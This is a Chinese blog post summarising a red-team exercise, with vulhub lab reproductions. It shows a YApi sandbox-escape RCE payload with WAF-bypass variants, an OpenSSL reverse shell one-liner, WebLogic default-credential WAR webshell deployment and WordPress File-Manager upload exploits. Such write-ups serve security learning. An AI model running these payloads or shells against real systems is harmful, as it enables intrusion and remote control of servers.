天问_Herbert555
天问_Herbert555

迷攻赛后总结

文章目录

  • 前言
  • yapi
    • waf绕过
    • Openssl 反弹 shell
  • Weblogic后台部署War包Getshell
  • WordPress插件File-Manager任意文件上传漏洞复现
  • textpattern

前言

这次比赛认识到了自己的菜,绕waf能力非常弱,同时也认识到了自己在实战中的不足,这次比赛防守和攻击方大佬那里学习到了很多姿势。

哪些思路局限:

  • 密码复用,以前没有收集密码的习惯
  • 没有绕waf的习惯,也是因为自己这方面积累的知识太少
  • 内网出网测试也没有做,没有考虑到只开放了哪些端口,或者协议

yapi

waf绕过

方法一,添加冗余字符

# 第一行添加大量注释
//qaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaqqaq

方法二,base64
迷攻赛后总结_第1张图片
方法三,好像是过滤了execSync(),所以这种方式能够绕过

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
const result = process.mainModule.require("child_process").execSync
const result2 = result("id")
mockJson = result2.toString()

方法四

{
     "project_id":"30","interface_id":"30","mock_script":"const sandbox = this\nconst 
ObjectConstructor = this.constructor\nconst FunctionConstructor = 
ObjectConstructor.constructor\nconst myfun = FunctionConstructor('return 
process')\nconst process = myfun()\nmockJson = 
process.mainModule.require(\"child_process\").execSync(\"whoami\").toString()","enab
le":true}

Openssl 反弹 shell

yapi这里反弹shell一直没成功,看大佬使用的是Openssl,因为只开放了部分端口协议,所以这里使用openssl能够成功反弹。下面是步骤:

首先我们需要在自己的机器上生成密钥

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

迷攻赛后总结_第2张图片

启动监听(渗透机器)

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

在这里插入图片描述

反弹shell(目标机器)

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.170.129:4444 > /tmp/s; rm /tmp/s

迷攻赛后总结_第3张图片

Weblogic后台部署War包Getshell

vulhub复现一波这个漏洞,参考Weblogic后台部署War包Getshell,首先开启环境

docker-compose up -d

首先存在weblogic弱口令,weblogic/Oracle@123

批量检测工具: rabbitmask /WeblogicWeakPwd
在这里插入图片描述
制作war包

jar -cvf  .\shell.war .\shell.jsp
或者
xxx.jsp,将其压缩为 shell.zip,然后重命名为 shell.war

war包的名字就是木马路径
迷攻赛后总结_第4张图片
迷攻赛后总结_第5张图片

迷攻赛后总结_第6张图片
迷攻赛后总结_第7张图片
迷攻赛后总结_第8张图片
访问http://192.168.170.129:7001/shell/shell.jsp,用冰蝎连接
迷攻赛后总结_第9张图片

WordPress插件File-Manager任意文件上传漏洞复现

比赛时是用配置文件config.bak中的密码,通过密码复用进入后台,这个思路值得学习

使用vulhub复现

cd wordpress/pwnscriptum
docker-compose up -d

插件地址,http://plugins.svn.wordpress.org/wp-file-manager/tags/6.0/
迷攻赛后总结_第10张图片
遇到报错
迷攻赛后总结_第11张图片

首先进入容器

docker exec -it 3c84 /bin/bash

容器内执行

apt-get update
apt-get install vim
vim /etc/php5/apache2/php.ini 
# 然后输入 /upload_max_filesize 定位到 upload_max_filesize
# 输入i进入编辑模式,修改为100M,退出保存
service apache2 restart

在这里插入图片描述
然后容器挂了,重启容器

docker restart 3c84df1d9002

此时查看upload_max_filesize已经成功修改
迷攻赛后总结_第12张图片
成功上传插件
迷攻赛后总结_第13张图片
访问漏洞页面,回显正常
http://127.0.0.1:8080/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
迷攻赛后总结_第14张图片
下载漏洞利用工具,wp-file-manager

# 上传了一个post的马,密码为cmd
py -3 .\file_manager_upload.py -u http://192.168.170.129:8080/

迷攻赛后总结_第15张图片

# 上传了个get型的马,通过马执行命令
py -3 .\file_manager_Rce.py -u http://192.168.170.129:8080/

迷攻赛后总结_第16张图片

textpattern

搜索漏洞

searchsploit textpattern
# 显示漏洞详细信息及路径
searchsploit -p 48943

迷攻赛后总结_第17张图片
这个洞打算用fofa复现一波,稍微找了找特征

body="发布于 Textpattern CMS"
body=''

发现必须要有账号密码才能复现,算了

你可能感兴趣的:(#,比赛题目总结,oracle)

  • 勇士赢了,我把掌声给了骑士 复角度的生活
    今天,不参加高考,只看NBA总决赛第三场的较量。这么说有点得罪高考生了,不过我没有当他们面秀,也没有跑到考点外面得瑟,所以我内心毫无波澜。毫无疑问,考场里不乏骑士和勇士球迷,在紧张作答语文考卷同时还心系着球队,不过我希望今天的比赛不会让你们有所分心,毕竟高考不会像比赛录像那样可以再来。今天,好像起来赶考一样,我起得很早,然而事实是睡不着,挺郁闷的,又不是我高考,我紧张什么?九点我并没有准时打开浏览
  • 《Python数据分析实战终极指南》 xjt921122 python数据分析开发语言
    对于分析师来说,大家在学习Python数据分析的路上,多多少少都遇到过很多大坑**,有关于技能和思维的**:Excel已经没办法处理现有的数据量了,应该学Python吗?找了一大堆Python和Pandas的资料来学习,为什么自己动手就懵了?跟着比赛类公开数据分析案例练了很久,为什么当自己面对数据需求还是只会数据处理而没有分析思路?学了对比、细分、聚类分析,也会用PEST、波特五力这类分析法,为啥
  • 2022-11-25 疫情卷土而来 快乐微笑每一天
    原计划本周因比赛休息两天半,结果一个阳性患者疫情转变了所有,轮休课表换掉,继续周五上课;比赛顺延,假期顺延,相对应确诊病例所在区域封闭。这疫情何时是一个尽头,谁也无法知晓,唯有进出带好口罩,保护自己,方能战胜疫情。疫情无情,人间温暖,期待疫情早日过去,大地重返平安和谐。
  • 稍微落后的人更容易被激励成长 有杕之杜
    今日纯分享。图片发自App沃顿商学院市场营销学教授乔纳·伯杰在接受《哈佛商业评论》采访时,介绍了他的一项研究。伯杰教授告诉参加实验的人,他们在跟隔壁房间的另一个人比赛打字速度,获胜的人有金钱奖励。一轮比赛之后,伯杰给了这些人不同的反馈,有的人被告知远远落后竞争对手,有的人被告知稍稍落后,还有的人被告知不相上下或者略微领先。结果只有那些被告知“稍微落后”的人,在第二轮中速度明显提高,而且总体来说,这
  • 向着明亮那方12.7 向着明亮那方的我们
    【水晶泥的妙用】在地上捡到一滩水晶泥,本想扔进垃圾桶,发现水晶泥上附着了些许蓝色钢笔墨水。我脑洞大开,水晶泥可不可以用来处理钢笔墨渍呢?正好垃圾桶那面瓷砖墙上有蓝色钢笔水痕迹,我用水晶泥沾了沾墨迹,很轻易地把墨色粘了下来,好干净。【长跑报名】我让同学们自愿报名参加冬季长跑比赛,课间将名字报给班长。班长把名字统计在本子上,把本子拿来给我看:“老师,我晚上回去给你做张电子表,发给你。”看来班长又学了新
  • MySQl篇(SQL - 基本介绍)(持续更新迭代) wclass-zhengge mysqlsql数据库
    目录一、简介二、SQL方言(分页查询为例)1.简介2.SQL方言大比拼2.1.Oracle2.1.1.使用ROWNUM实现分页查询2.1.2.使用ROW_NUMBER()实现分页查询2.2.MySQL2.3.PostgreSQL三、语法规范四、注释五、MySQL脚本中的标点符号一、简介1、SQL是结构化查询语言(StructureQueryLanguage),专门用来操作/访问关系型数据库的通用语
  • 梧桐数据库(WuTongDB):数据库技术中都有哪些常见的优化器 鲁鲁517 梧桐数据库梧桐数据库
    以下是一些常见的数据库优化器:1.CBO(Cost-BasedOptimizer)应用场景:广泛应用于关系型数据库中,如Oracle、PostgreSQL、MySQL等。工作原理:通过计算不同执行计划的代价(如CPU、I/O等资源消耗),选择最低代价的执行计划。代表数据库:Oracle、PostgreSQL、MySQL。特点:CBO使用统计信息(如表大小、索引分布)来评估查询的代价。2.RBO(R
  • 全运会结束了除了闭幕式无亮点外对西安发展大有裨益 新心芯达人
    前言昨天是最后一个比赛日,山东代表团单日揽4金,最后以58金55银47铜,总计160枚奖牌的成绩位列奖牌榜第一的位置,这已经是山东连续第四届全运会取得奖牌榜第一的成绩,以绝对的优势达成了四连冠成就,山东属实厉害!广东在本届全运会中也拼尽了全力,在26号的最后一个比赛日,狂揽6金,最后以54金,32银,56铜,总计142枚奖牌位列奖牌榜第二的位置,虽然最后一个比赛日爆发连夺6金,最后还是没有撼动山东
  • 72称体重 作者:陈瑄仪 家庭教育CEO
    2019年5月1日星期三大雨昭阳区今天我们开始准备明天的比赛,教练说早上8:00叫我们到市委党校集合,爸爸很早就送我到市委党校了,我在那里等了好久,教练还没来,我就在那里跑步,跑了十几圈教练还没有来又跑几圈教练还没来,我们就觉得奇怪了,教练不会在家里睡懒觉吧,我们又跑了几圈才休息。等教练来了我们就去称重体重,第一次称,没过,我急了,教练说我超了0.3公斤,让我去跑了几圈重量才减下来,明明之前几天只
  • 2019-11-29晨间日记 麦新
    今天是什么日子起床:6:00就寝:23:30天气:晴朗心情:平静纪念日:第二场比赛叫我起床的不是闹钟是梦想年度目标及关键点:国考考研本月重要成果:学习今日三只青蛙/番茄钟点评作业出镜点评夜班成功日志-记录三五件有收获的事务出镜点评点评作业夜班财务检视-1人际的投入来回跑~开卷有益-学习/读书/听书《孔子》健康与饮食今日步数:8000+好习惯打卡早晚打卡阅读打卡听书打卡社群打卡
  • 特雷-杨表现出色,比肩詹姆斯,库里 Allen196
    特雷-杨得到35分11次助攻。从2000年以后只有两个新秀可以打出这样的数据(至少35分,10次助攻),他们的名字是:史蒂芬-库里,勒布朗-詹姆斯。现在亚特兰大老鹰队的特雷-杨加入了他们的行列,在对阵克里夫兰骑士队的比赛中,他拿到了35分,11次助攻帮助老鹰队取得胜利,同时也是老鹰队主教练罗伊德-皮尔斯作为NBA主教练的首场胜利。揭幕战战胜尼克斯,第二场战胜防守强硬的灰熊后,杨再次帮助球队战胜了骑
  • D15 论语学习笔记 许小兔Angelina
    悟:上级对下级的宽容:凡事成定局,就不你说了;已接近完结的事,也没必要匡正和挽回了;既然是过去的事,也没必要追究得失和责任了。对待孩子教育也是,不用“问责制”,这样容易让孩子因为害怕担责而说谎。应当循循善诱,避免再犯错才是最重要的。3.16:【原文】子曰:“射不主皮,为力不同科,古之道也。”【译文】孔子说:“射箭比赛不以射透为主,而主要看是否射得准确,因为人的力量不同,自古如此。”3.17:【原文
  • 解决mysql漏洞 Oracle MySQL Server远程安全漏洞(CVE-2015-0411) dieweidong5625 数据库运维java
    有时候会检测到服务器有很多漏洞,而大部分漏洞都是由于服务的版本过低的原因,因为官网出现漏洞就会发布新版本来修复这个漏洞,所以一般情况下,我们只需要对相应的软件包进行升级到安全版本即可。通过查阅官网信息,OracleMySQLServer远程安全漏洞(CVE-2015-0411),受影响系统:OracleMySQLServer/usr/databases.sql//先备份原有所有数据,防止数据丢失。
  • MySQL内存结构 san.hang 数据库数据结构与算法
    实际上MySQL内存的组成和Oracle类似,也可以分为SGA(系统全局区)和PGA(程序缓存区)。mysql>showvariableslike"%buffer%";一、SGA1.innodb_buffer_bool用来缓存Innodb表的数据、索引、插入缓冲、数据字典等信息。2.innodb_log_buffer事务在内存中的缓冲,即redlogbuffer的大小3.querycache高速查
  • 中国男篮:15万赛后评分,赵继伟第三,赵睿3.8分倒数第一 体娱荒原
    在某体育社交软件中,有15万人之多为中国男篮第二场比赛进行点评,我们一起来看看他们的评分排名。这场比赛有12人出场,全部球员都有得分进账。吴前9.9分,这场比赛他拿到全队最高的18分还有4篮板3助攻3抢断,虽然也有3次失误和5次犯规,但是瑕不掩瑜,特别是最后一节单节得到10分跟赵继伟的连线帮助球队逆转对手赢得一场胜利,他的发挥至关重要,要知道对手对他也有研究,基本上都是贴身防守,持球还有夹击,吴前
  • Oracle(125)如何执行不完全恢复? 辞暮尔尔-烟火年年 Oracleoracle数据库
    不完全恢复(IncompleteRecovery)是指将Oracle数据库恢复到一个特定时间点、SCN(系统变更号)或取消点,而不是恢复到最近的备份后的最新状态。以下是详细的步骤和代码示例,展示如何执行不完全恢复。准备工作备份控制文件:确保你有控制文件的备份。备份数据文件:确保你有数据文件的备份。备份归档日志:确保你有最新的归档日志。不完全恢复的基本步骤关闭数据库:确保数据库处于关闭状态。启动数据
  • 平昌冬奥,人生竞赛不要给对手和裁判任何机会 小猫_003e
    如火如荼的平昌冬奥会拉下了帷幕,但是自从某年的伦敦奥运会之后,我们中国队自从好像就“最爱干犯规的事儿”。2月20日,短道速滑女子3000米接力赛,可以说是相当令人痛心了。比赛中,韩国队交接棒失误“扑街”,阻拦了加拿大队,带来的连锁反应也影响了中国队。中国队以微弱劣势落后韩国队,第二个冲线!韩国队这次失误犯规那么明显,应该唱费玉清的我送你离开千里之外。但···最终赛场上裁判宣布:韩国队冠军,中国队、
  • Oracle EBS中AR模块的财务流程概览 六月雨滴 EBSoracle
    应收账款(AR)模块是OracleE-BusinessSuite(EBS)中另一个重要的财务管理模块,主要用于管理企业销售过程中的账款回收。下面是AR模块中的一些关键财务流程及其详细说明:1.销售订单管理创建销售订单:当客户下单时,销售人员在系统中创建销售订单。订单确认:确认销售订单的详细信息,包括商品、数量、价格等。订单履行:确保仓库有足够的库存来满足订单需求。2.发票生成发票创建:根据销售订单
  • oracle数据库安装和配置详细讲解 程序员小羊! 运维数据库oracle
    大家好,我是程序员小羊!前言:Oracle数据库是全球广泛使用的关系型数据库管理系统(RDBMS),提供高性能、可靠性、安全性和可扩展性,广泛应用于企业关键任务系统。下面详细介绍如何在CentOS系统上安装和配置Oracle数据库。1.前提条件1.1硬件要求内存:最小1GB,推荐2GB以上。硬盘:至少10GB的可用空间,视具体应用需求而定。1.2软件要求操作系统:CentOS7或CentOS8(确
  • oracle实验-RMAN的PIPE接口 congqingm32098 数据库
    RMAN的PIPE接口RMAN除了支持交互式和批处理式,还支持一种PIPE的接口,通过这种PIPE接口,可以在ORACLE中将各种命令发送给RMAN。首先,以PIPE方式启动RMAN,其中P1是管道的名称:F:>RMANPIPEP1TARGET/@TESTNOCATALOG恢复管理器:版本9.2.0.4.0-ProductionCopyright(c)1995,2002,OracleCorpora
  • 周记15 安诗雨
    星期天回学校的时候,发现寝室里有好几只臭屁虫。星期一的电学很难,数学也非常难,让我感到非常吃力。历史比赛日期就在11月29日,也就是我的生日。唉,过生日去比赛,我好难受。不仅如此,还是高手对决……老师希望“保三争二冲一”,我也希望来一个一等奖,这样多光荣,也证明了自己的实力。不管怎么样,要全力以赴。星期二我们进行了电子技能实训期中考试。对我来说,简直不要太轻松。无非就是拿万用表测电阻值,顺带读出来
  • 【足坛简讯】9月2日足坛简讯及比赛预告 神州足球
    【足坛简讯】9月2日足坛简讯及比赛预告9月2日足坛简讯与比赛预告比赛结果✍️意甲第3轮:十人米兰2-1罗马三连胜领跑莱奥凌空斩吉鲁点射托莫里染红✍️德甲第3轮:两连平!多特连丢两球2-2遭升班马海登海姆扳平布兰特凌空斩✍️沙特联:米特洛维奇戴帽本泽马破门新月连入三球4-3逆转吉达联合✍️热身赛:中国国奥1-0土库曼斯坦国奥,艾菲尔丁制胜球国内足坛✍️明日之星足球赛:上海队点球憾负曼城,大阪樱花蔚山
  • 都2024年了,还在问网络安全怎么入门,气得我当场脑血栓发作 网安大师兄 web安全网络安全网络安全学习
    前言本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。正题首先,在准备进入这个行业之前,我们要问一下我们的内心,工作千千万,为什么要想进入这个行业?相信每个人的答案都不一样,有的人会说,这个行业整体上比其他行业赚钱多,有的人会说特别喜欢技术,想钻研一
  • 第十二章〈一〉 汝此一生1985
    接下来的运动会时光便是和东美一起度过。两人时不时就去超市买上一大袋东西,提着一大袋东西然后坐在操场上看着比赛消磨时光。下午两三点时刻,太阳很大,笼罩了整个操场,晒得人只想睡觉。秦嘉杨在篮球场挥洒热汗,东美躺在林召航腿上和林召航一起听着歌。拒绝去看秦嘉杨比赛,“我可不想看见他和他那个情人的亲密互动。”说着忿忿填进嘴里一个薯片。林召航拔下耳机,“哪来的情人?”东美:“姓篮名球”东美的嘴巴变成了“0”形
  • Dev-C++头文件小Bug 蒟蒻pzjdsg666 bugc语言c++
    Dev-C++应该是大家最常用的C++软件了吧,但它有几个小Bug。1、“万能头”众所周知,“万能头”在官方比赛中不能使用(你要用没人拦着你~呵呵),但在Dev-C++可以使用。所以,我们可以省掉好多头文件!如下:#includeusingnamespacestd;2、C语言头文件在Dev-C++中,你竟然可以使用C语言头文件(惊不惊喜~意不意外~)如下:#include3、iostream竟然包
  • ORACLE查看索引是否有效 清水 索引oracle
    SELECTSTATUSFROMUSER_INDEXESWHEREINDEX_NAME='索引名';VALID——索引有效
  • Java 学习路线:语言、框架、中间件与数据库 高危型 java
    Java是一门功能强大、应用广泛的编程语言,适用于企业级应用、Web开发、大数据处理、Android开发等各种场景。这里为大家介绍了一下我认为较为合适的学习路线一、Java基础1.1Java语言基础1.1.1安装JDK和IDE安装JDK:下载JDK:访问Oracle官网,下载最新的JavaDevelopmentKit(JDK)。安装JDK:按照操作系统要求安装JDK并配置环境变量。Windows上
  • 跃迁第一天 师者之写道
    《跃迁》你怎么也想不到火车在替代马车的时候,很多人嘲笑火车,甚至夸张地和火车比赛,直到今天,马车被淘汰了,更别说有能赶上马车的火车了!时代在发展,我们稍微不学习,不改变就可能永远地被淘汰在世界的某一个角落里。今天我用拆书法拆了我自己。
  • 周二竞足:塞维利亚力争小胜巴萨,亚特兰大击败热那亚如探囊取物 阿东侃球
    昨日赛事回顾:富勒姆对阵谢菲尔德联这场很简单,整体方向是正确的,但是谢菲联在开局3分钟进了1个球后,富勒姆竟然没能追平,全场就只有这1个进球,有点可惜。莱万特和巴伦西亚这一场比赛简直就是折磨人,上半场莱万特2-1领先,下半场却被反攻最终3-4结束,硬生生的打出了胜负的战果,着实惊到了我。周二003意甲:热那亚VS亚特兰大比赛时间:2021-12-2203:45基本面分析:热那亚联赛1胜7平10负积
  • 当姨妈遇见马拉松赛事,该怎么破 语非年
    图片发自App凌晨4:30分匆匆洗漱出门,到5:10分集合点与团长、许总车自驾前往参赛地(漳州市华安县),车上听说参赛点大雨倾盆,本来就有心无意参赛的(没雨就跑,有雨弃赛),果不其然在进入华安县的时候就遇瓢泼大雨,于是与如风大神们说笑着,若到起跑点还是这般大雨就弃赛。因都身体抱恙。所幸,天工不负有心人,到达目的地存包直到开跑,雨奇迹般的停了。临近比赛的前三天正好生理期,在纠结去还是不去的时候,内心
  • java线程的无限循环和退出 3213213333332132 java
    最近想写一个游戏,然后碰到有关线程的问题,网上查了好多资料都没满足。 突然想起了前段时间看的有关线程的视频,于是信手拈来写了一个线程的代码片段。 希望帮助刚学java线程的童鞋 package thread; import java.text.SimpleDateFormat; import java.util.Calendar; import java.util.Date
  • tomcat 容器 BlueSkator tomcatWebservlet
    Tomcat的组成部分 1、server A Server element represents the entire Catalina servlet container. (Singleton) 2、service service包括多个connector以及一个engine,其职责为处理由connector获得的客户请求。   3、connector 一个connector
  • php递归,静态变量,匿名函数使用 dcj3sjt126com PHP递归函数匿名函数静态变量引用传参
      <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Current To-Do List</title> </head> <body>
  • 属性颜色字体变化 周华华 JavaScript
    function changSize(className){ var diva=byId("fot") diva.className=className; } </script> <style type="text/css"> .max{ background: #900; color:#039;
  • 将properties内容放置到map中 g21121 properties
    代码比较简单: private static Map<Object, Object> map; private static Properties p; static { //读取properties文件 InputStream is = XXX.class.getClassLoader().getResourceAsStream("xxx.properti
  • [简单]拼接字符串 53873039oycg 字符串
             工作中遇到需要从Map里面取值拼接字符串的情况,自己写了个,不是很好,欢迎提出更优雅的写法,代码如下:           import java.util.HashMap; import java.uti
  • Struts2学习 云端月影
    最近开始关注struts2的新特性,从这个版本开始,Struts开始使用convention-plugin代替codebehind-plugin来实现struts的零配置。 配置文件精简了,的确是简便了开发过程,但是,我们熟悉的配置突然disappear了,真是一下很不适应。跟着潮流走吧,看看该怎样来搞定convention-plugin。 使用Convention插件,你需要将其JAR文件放
  • Java新手入门的30个基本概念二 aijuans java新手java 入门
    基本概念:  1.OOP中唯一关系的是对象的接口是什么,就像计算机的销售商她不管电源内部结构是怎样的,他只关系能否给你提供电就行了,也就是只要知道can or not而不是how and why.所有的程序是由一定的属性和行为对象组成的,不同的对象的访问通过函数调用来完成,对象间所有的交流都是通过方法调用,通过对封装对象数据,很大限度上提高复用率。  2.OOP中最重要的思想是类,类是模板是蓝图,
  • jedis 简单使用 antlove javarediscachecommandjedis
    jedis.RedisOperationCollection.java package jedis; import org.apache.log4j.Logger; import redis.clients.jedis.Jedis; import java.util.List; import java.util.Map; import java.util.Set; pub
  • PL/SQL的函数和包体的基础 百合不是茶 PL/SQL编程函数包体显示包的具体数据
    由于明天举要上课,所以刚刚将代码敲了一遍PL/SQL的函数和包体的实现(单例模式过几天好好的总结下再发出来);以便明天能更好的学习PL/SQL的循环,今天太累了,所以早点睡觉,明天继续PL/SQL总有一天我会将你永远的记载在心里,,,   函数; 函数:PL/SQL中的函数相当于java中的方法;函数有返回值 定义函数的 --输入姓名找到该姓名的年薪 create or re
  • Mockito(二)--实例篇 bijian1013 持续集成mockito单元测试
            学习了基本知识后,就可以实战了,Mockito的实际使用还是比较麻烦的。因为在实际使用中,最常遇到的就是需要模拟第三方类库的行为。         比如现在有一个类FTPFileTransfer,实现了向FTP传输文件的功能。这个类中使用了a
  • 精通Oracle10编程SQL(7)编写控制结构 bijian1013 oracle数据库plsql
    /* *编写控制结构 */ --条件分支语句 --简单条件判断 DECLARE v_sal NUMBER(6,2); BEGIN select sal into v_sal from emp where lower(ename)=lower('&name'); if v_sal<2000 then update emp set
  • 【Log4j二】Log4j属性文件配置详解 bit1129 log4j
    如下是一个log4j.properties的配置   log4j.rootCategory=INFO, stdout , R log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.layout=org.apache.log4j.PatternLayout log4j.appe
  • java集合排序笔记 白糖_ java
    public class CollectionDemo implements Serializable,Comparable<CollectionDemo>{ private static final long serialVersionUID = -2958090810811192128L; private int id; private String nam
  • java导致linux负载过高的定位方法 ronin47
    定位java进程ID 可以使用top或ps -ef |grep java ![图片描述][1] 根据进程ID找到最消耗资源的java pid 比如第一步找到的进程ID为5431 执行 top -p 5431 -H ![图片描述][2] 打印java栈信息 $ jstack -l 5431 > 5431.log 在栈信息中定位具体问题 将消耗资源的Java PID转
  • 给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数 bylijinnan 函数
    import java.util.ArrayList; import java.util.List; import java.util.Random; public class RandNFromRand5 { /** 题目:给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数。 解法1: f(k) = (x0-1)*5^0+(x1-
  • PL/SQL Developer保存布局 Kai_Ge
          近日由于项目需要,数据库从DB2迁移到ORCAL,因此数据库连接客户端选择了PL/SQL Developer。由于软件运用不熟悉,造成了很多麻烦,最主要的就是进入后,左边列表有很多选项,自己删除了一些选项卡,布局很满意了,下次进入后又恢复了以前的布局,很是苦恼。在众多PL/SQL Developer使用技巧中找到如下这段:   &n
  • [未来战士计划]超能查派[剧透,慎入] comsci 计划
           非常好看,超能查派,这部电影......为我们这些热爱人工智能的工程技术人员提供一些参考意见和思想........        虽然电影里面的人物形象不是非常的可爱....但是非常的贴近现实生活....    &nbs
  • Google Map API V2 dai_lm google map
    以后如果要开发包含google map的程序就更麻烦咯 http://www.cnblogs.com/mengdd/archive/2013/01/01/2841390.html 找到篇不错的文章,大家可以参考一下 http://blog.sina.com.cn/s/blog_c2839d410101jahv.html 1. 创建Android工程 由于v2的key需要G
  • java数据计算层的几种解决方法2 datamachine javasql集算器
    2、SQL     SQL/SP/JDBC在这里属于一类,这是老牌的数据计算层,性能和灵活性是它的优势。但随着新情况的不断出现,单纯用SQL已经难以满足需求,比如: JAVA开发规模的扩大,数据量的剧增,复杂计算问题的涌现。虽然SQL得高分的指标不多,但都是权重最高的。     成熟度:5星。最成熟的。   
  • Linux下Telnet的安装与运行 dcj3sjt126com linuxtelnet
    Linux下Telnet的安装与运行   linux默认是使用SSH服务的 而不安装telnet服务  如果要使用telnet 就必须先安装相应的软件包  即使安装了软件包 默认的设置telnet 服务也是不运行的 需要手工进行设置 如果是redhat9,则在第三张光盘中找到 telnet-server-0.17-25.i386.rpm
  • PHP中钩子函数的实现与认识 dcj3sjt126com PHP
    假如有这么一段程序: function fun(){ fun1(); fun2(); }   首先程序执行完fun1()之后执行fun2()然后fun()结束。   但是,假如我们想对函数做一些变化。比如说,fun是一个解析函数,我们希望后期可以提供丰富的解析函数,而究竟用哪个函数解析,我们希望在配置文件中配置。这个时候就可以发挥钩子的力量了。   我们可以在fu
  • EOS中的WorkSpace密码修改 蕃薯耀 修改WorkSpace密码
    EOS中BPS的WorkSpace密码修改 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 201
  • SpringMVC4零配置--SpringSecurity相关配置【SpringSecurityConfig】 hanqunfeng SpringSecurity
     SpringSecurity的配置相对来说有些复杂,如果是完整的bean配置,则需要配置大量的bean,所以xml配置时使用了命名空间来简化配置,同样,spring为我们提供了一个抽象类WebSecurityConfigurerAdapter和一个注解@EnableWebMvcSecurity,达到同样减少bean配置的目的,如下:   applicationContex
  • ie 9 kendo ui中ajax跨域的问题 jackyrong AJAX跨域
    这两天遇到个问题,kendo ui的datagrid,根据json去读取数据,然后前端通过kendo ui的datagrid去渲染,但很奇怪的是,在ie 10,ie 11,chrome,firefox等浏览器中,同样的程序, 浏览起来是没问题的,但把应用放到公网上的一台服务器, 却发现如下情况: 1) ie 9下,不能出现任何数据,但用IE 9浏览器浏览本机的应用,却没任何问题
  • 不要让别人笑你不能成为程序员 lampcy 编程程序员
    在经历六个月的编程集训之后,我刚刚完成了我的第一次一对一的编码评估。但是事情并没有如我所想的那般顺利。 说实话,我感觉我的脑细胞像被轰炸过一样。 手慢慢地离开键盘,心里很压抑。不禁默默祈祷:一切都会进展顺利的,对吧?至少有些地方我的回答应该是没有遗漏的,是不是? 难道我选择编程真的是一个巨大的错误吗——我真的永远也成不了程序员吗? 我需要一点点安慰。在自我怀疑,不安全感和脆弱等等像龙卷风一
  • 马皇后的贤德 nannan408
       马皇后不怕朱元璋的坏脾气,并敢理直气壮地吹耳边风。众所周知,朱元璋不喜欢女人干政,他认为“后妃虽母仪天下,然不可使干政事”,因为“宠之太过,则骄恣犯分,上下失序”,因此还特地命人纂述《女诫》,以示警诫。但马皇后是个例外。   有一次,马皇后问朱元璋道:“如今天下老百姓安居乐业了吗?”朱元璋不高兴地回答:“这不是你应该问的。”马皇后振振有词地回敬道:“陛下是天下之父,
  • 选择某个属性值最大的那条记录(不仅仅包含指定属性,而是想要什么属性都可以) Rainbow702 sqlgroup by最大值max最大的那条记录
    好久好久不写SQL了,技能退化严重啊!!!   直入主题: 比如我有一张表,file_info, 它有两个属性(但实际不只,我这里只是作说明用): file_code, file_version 同一个code可能对应多个version 现在,我想针对每一个code,取得它相关的记录中,version 值 最大的那条记录, SQL如下: select *
  • VBScript脚本语言 tntxia VBScript
      VBScript 是基于VB的脚本语言。主要用于Asp和Excel的编程。   VB家族语言简介   Visual Basic 6.0           源于BASIC语言。           由微软公司开发的包含协助开发环境的事
  • java中枚举类型的使用 xiao1zhao2 javaenum枚举1.5新特性
    枚举类型是j2se在1.5引入的新的类型,通过关键字enum来定义,常用来存储一些常量.   1.定义一个简单的枚举类型 public enum Sex { MAN, WOMAN }   枚举类型本质是类,编译此段代码会生成.class文件.通过Sex.MAN来访问Sex中的成员,其返回值是Sex类型.   2.常用方法 静态的values()方
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他